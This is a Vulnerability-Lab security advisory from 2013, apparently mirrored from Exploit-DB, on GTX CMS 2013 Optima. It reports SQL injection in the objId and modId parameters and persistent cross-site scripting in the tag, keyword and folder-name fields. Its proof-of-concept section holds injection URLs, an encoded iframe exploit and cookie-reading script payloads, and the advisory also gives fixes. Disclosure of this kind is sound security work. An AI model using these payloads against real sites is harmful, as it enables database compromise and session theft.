GTX CMS 2013 Optima – SQL Injection

  • 作者: Vulnerability-Lab
    日期: 2013-10-29
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/29280/
  • Document Title:
    ===============
    GTX CMS 2013 Optima - Multiple Web Vulnerabilities
    
    
    References (Source):
    ====================
    http://www.vulnerability-lab.com/get_content.php?id=1124
    
    
    Release Date:
    =============
    2013-10-29
    
    
    Vulnerability Laboratory ID (VL-ID):
    ====================================
    1124
    
    
    Common Vulnerability Scoring System:
    ====================================
    7.2
    
    
    Product & Service Introduction:
    ===============================
    We provide you with the perfect community GTX CMS software solution - making it ready to meet your needs and 
    requirements and tailored to your corporate design! The complete setup of your individual interactive community 
    portal or your website is done by us, so you can get started right away!
    
    GTX CMS is extremely flexible and can be operated as a closed community (eg parallel to your existing website) 
    and as a normal website with a closed member.Datails, refer to the section `About GTX CMS`.
    
    (Copy of the Vendor Homepage: http://www.gtx-cms.de/ )
    
    
    Abstract Advisory Information:
    ==============================
    The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official GTX Content Management System 2013 web application.
    
    
    Vulnerability Disclosure Timeline:
    ==================================
    2013-10-29:Public Disclosure (Vulnerability Laboratory)
    
    
    Discovery Status:
    =================
    Published
    
    
    Affected Product(s):
    ====================
    OBM-Media e.K.
    Product: GTX CMS - Web Application Basic, Standard and Optima
    
    
    Exploitation Technique:
    =======================
    Remote
    
    
    Severity Level:
    ===============
    High
    
    
    Technical Details & Description:
    ================================
    1.1
    Multiple remote sql injection web vulnerabilities are detected in the official GTX Content Management System 2013 web application.
    The vulnerability allows remote attackers to unauthorized inject own sql commands to compromise the web-application or the web-server dbms.
    
    The sql injection vulnerabilities are located in the vulnerable `objId` and `modId` values of the tagSearchTag module. Remote attackers are 
    able to inject own sql commands via GET method request to compromise the database management system or cms web-application. The inject can 
    be done by usage of the executable ajax path via GET method request or by usage of the objId in the tagSearchTag module POST method request. 
    The severity of the remote sql injection bugs is estimated as high.
    
    Exploitation of the remote sql injection web vulnerability requires no user interaction and a low privileged web-application user account.
    Successful exploitation of the remote sql injection bug results in database management system and cms or web-application compromise.
    
    
    Vulnerable Module(s):
    				[+] ajax
    
    Vulnerable File(s):
    				[+] tagSearchTag
    
    Vulnerable Parameter(s):
    				[+] objId
    				[+] modId
    
    
    
    1.2
    Multiple persistent input validation web vulnerabilities are detected in the official GTX Content Management System 2013 web application.
    The web vulnerability allows remote attackers to inject via POST method own malicious script codes to the online service application-side.
    
    The first persistent input validation web vulnerability is located in the ajax `tag-searchTag` module and the connected vulnerable 
    q parameter. Remote attackers are able to inject own malicious script codes as tag name. The execute occurs in the main communication 
    module when an user/admin is processing to review the article or comments. Exploitation of the vulnerability requires a low privileged 
    web-application user account and only low user interaction (view, no click!).
    
    The secound persistent web vulnerability is located in the `linkverzeichnis` (link-directory) add module. Remote attackers are able 
    to inject own malicious script codes as `Schl�sselworter` (keywords) in the search. The execute occurs in the main link directory 
    module of the web-application. Exploitation of the vulnerability requires a low privileged web-application user account and low or 
    medium user interaction (click!).
    
    The third persistent web vulnerability is located in the `Ordnerverwaltung` (Folder/Path Management) module. Remote attackers are 
    able to manipulate the vulnerable `ordner` name value in the add POST method request. The execute occurs in the main path of the 
    `persoenliche nachrichten` (private messages) module in the cms control panel. Exploitation of the vulnerability requires a low 
    privileged web-application user account and medium user interaction (add+click!).
    
    Successful exploitation of the remote vulnerabilities lead to persistent session hijacking (customers), account steal via persistent 
    web attacks, persistent phishing, persistent redirect to external sources, persistent redirect as file downloads or persistent 
    manipulation of affected and connected context.
    
    
    Vulnerable Module(s):
    				[+] ajax/tagSearchTag
    				[+] suche/linkverzeichnis
    				[+] pers-nachrichten/ordnerverwaltung
    
    Vulnerable Input(s):
    				[+] Tags
    				[+] Suche - Linkverzeichnis> Schl�sselw�rter - Suchbegriff(e) &Entfernung von
    				[+] Orderverwaltung - Add
    
    Vulnerable Parameter(s):
    				[+] q
    				[+] keywords
    				[+] ordner
    
    
    Proof of Concept (PoC):
    =======================
    1.1
    The sql injection web vulnerabilities can be exploited by remote attackers with low privileged web application user account and 
    without user interaction. For demonstration or to reproduce ...
    
    PoC:
    http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=[TAG(x)]&modId=ptd&objId=37_%20'null[SQL INJECTION VULNErABILITY!]--
    http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=[TAG(x)]&modId=ptd%20'null[SQL INJECTION VULNErABILITY!]--&objId=3
    
    
    Exploit:
    <script type=``text/javascript``>document.write(unescape(``<script type=\``text\/javascript\
    ``>document.write\(unescape\(\``%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EGTX%20CMS%20-
    %20SQL%20INJECTION%20EXPLOIT%3C/title%3E%0A%3Ciframe%20src%3Dhttp%3A//gtx.localhost
    %3A8080/Ajax/tagSearchTag%3Fq%3D%5BTAG%28x%29%5D%26modId%3Dptd%26objId%3D37_%2520%27null
    %5BSQL%20INJECTION%20VULNErABILITY%21%5D--%20width%3D%22800%22%20height%3D%22800%22%3E%0A%3C
    iframe%20src%3Dhttp%3A//gtx.localhost%3A8080/Ajax/tagSearchTag%3Fq%3D%5BTAG%28x%29%5D%26modId
    %3Dptd%2520%27null%5BSQL%20INJECTION%20VULNErABILITY%21%5D--%20width%3D%22800%22%20height%3D
    %22800%22%3E%26objId%3Dx%0A%3C/body%3E%3C/head%3E%0A%3C/html%3E%0A%0A\``\)\);<\/script>``));</script>
    
    
    
    
    1.2
    The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged web application user accounts 
    and low user interaction. For demonstration or to reproduce ...
    
    
    1.2.1
    
    PoC: Tags in Article or News
    <div class=``right``>
    <div id=``tagTagsWidget``>
    <ul class=``as-selections`` id=``as-selections-049``><li class=``as-selection-item blur`` 
    id=``as-selection-002``><a class=``as-close``>�</a>>``<iframe src=``GTX-CMS.de%20%20Mitglieder-
    Communities%20f%C3%BCr%20Golfclubs,%20Tennisclubs,%20Vereine,%20Verb%C3%A4nde%20etc.%20-%20auch%20als%20Intranet-CMS%20bestens%20
    geeignet%20%C2%BB%20Linkverzeichnis%20%C2%BB%20Link%20hinzuf%C3%BCgen_files/a.htm``></iframe></li><li class=``as-original`` 
    id=``as-original-049``><input autocomplete=``off`` name=``tags`` id=``as-input-049`` class=``text as-input`` type=``text``>
    <input value=``>``<iframe src=a> >``<iframe src=a>>``<iframe src=a> >``<iframe src=a>>``
    <iframe src=a> >``<iframe src=a>>``<iframe src=a> >``<iframe src=a>>``<iframe src=a> >``<iframe src=a>,>``
    <iframe src=http://vuln-lab.com>,`` class=``as-values`` name=``as_values_049`` id=``as-values-049`` type=``hidden``></li></ul>
    <div style=``display: none;`` class=``as-results`` id=``as-results-049``></div>
    </div>
    
    
    Inject: Tags
    http://gtx-cms.localhost:8080/linkverzeichnis/hinzufuegen
    
    PoC (PATH):
    http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Da%3E%20%3E%22%3Ciframe%20src%3Da%3E&modId=ptd&objId=null
    http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Da%3E%20%3E%22%3Ciframe%20src%3Da%3E%20&modId=ptd&objId=null
    http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Dhttp%3Avuln-lab.com%3E&modId=ptd&objId=null
    
    
    
    1.2.2
    
    PoC: Suchbegriff(e) &Entfernung von
    
    <div class=``box``>
    <div class=``formItems``>
    <div class=``item row1``>
    <div class=``left``>
    Schl�sselw�rter</div><div class=``right``>>``<iframe src=``GTX-CMS.de%20%20Mitglieder-Communities%20f%C3%BCr%20Golfclubs,
    %20Tennisclubs,%20Vereine,%20Verb%C3%A4nde%20etc.%20-%20auch%20als%20Intranet-CMS%20bestens%20geeignet%20%C2%BB%20Suche%20%C2%BB%20
    Linkverzeichnis%20%C2%BB%20Ergebnisse2_files/a.htm`` onload=``alert(document.cookie)`` <=```` div=````>
    </div>
    </div>
    </div>
    
    
    Inject: Suchbegriff(e) &Entfernung von
    http://gtx-cms.localhost:8080/linkverzeichnis/hinzufuegen
    
    Output: 
    Suche - Linkverzeichnis> Schl�sselw�rter
    http://gtx-cms.localhost:8080/suche/linkverzeichnis
    
    
    
    
    1.2.3
    
    PoC: Ordnerverwaltung - Ordner Name
    
    <li class=``seperator``></li>
    <!-- Users folders -->
    <li><a class=``icon`` href=``/pers-nachrichten/ordner/iframe-srchttpvuln-labcom-onloadalertdocumentcookie-
    iframe-srchttpvuln-labcom-onloadalertdocumentcookie-_1``>
    <img src=``images/icons/Sophistique/files_24.png`` alt=``Ordner``>
    <span>>``<iframe src=``http://vuln-lab.com`` onload=``alert(document.cookie)`` <=``
    %20%20.``>``<iframe src=http://vuln-lab.com onload=alert(document.cookie) < (0)</span>
    </a></li>
    
    
    Inject: OrderVerwaltung Add
    http://gtx-cms.localhost:8080/pers-nachrichten/ordnerverwaltung
    
    Output: Pers�nliche Nachrichten
    http://gtx-cms.localhost:8080/pers-nachrichten
    http://gtx-cms.localhost:8080/pers-nachrichten/ordnerverwaltung
    
    
    Solution - Fix & Patch:
    =======================
    1.1
    The sql injection web vulnerabilities can be patched by a secure parse and encode of the vulnerable `modId` and `objId` values in 
    the tag search module.
    
    1.2
    The persistent input validation web vulnerabilities can be patched by a secure parse and encode of the vulnerable 
    ordner name, q and keyword parameters.
    Encode the output index of the ordner name in the private messages box and connected resources.
    Parse the tag search error output to prevent script code executions.
    
    
    Security Risk:
    ==============
    1.1
    The security risk of the remote sql injection web vulnerabilities are estimated as high(+).
    
    1.2
    The security risk of the persistent input validation web vulnerabilities are estimated as medium(+).
    
    
    Credits & Authors:
    ==================
    Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
    
    
    Disclaimer & Information:
    =========================
    The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
    either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
    Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
    profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
    states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
    may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
    or trade with fraud/stolen material.
    
    Domains:www.vulnerability-lab.com 	- www.vuln-lab.com			 - www.evolution-sec.com
    Contact:admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	 - admin@evolution-sec.com
    Section:www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		 - magazine.vulnerability-db.com
    Social:	twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	 - youtube.com/user/vulnerability0lab
    Feeds:	vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
    
    Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
    Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
    media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
    other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
    modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
    
    				Copyright � 2013 | Vulnerability Laboratory [Evolution Security]
    
    
    
    -- 
    VULNERABILITY LABORATORY RESEARCH TEAM
    DOMAIN: www.vulnerability-lab.com
    CONTACT: research@vulnerability-lab.com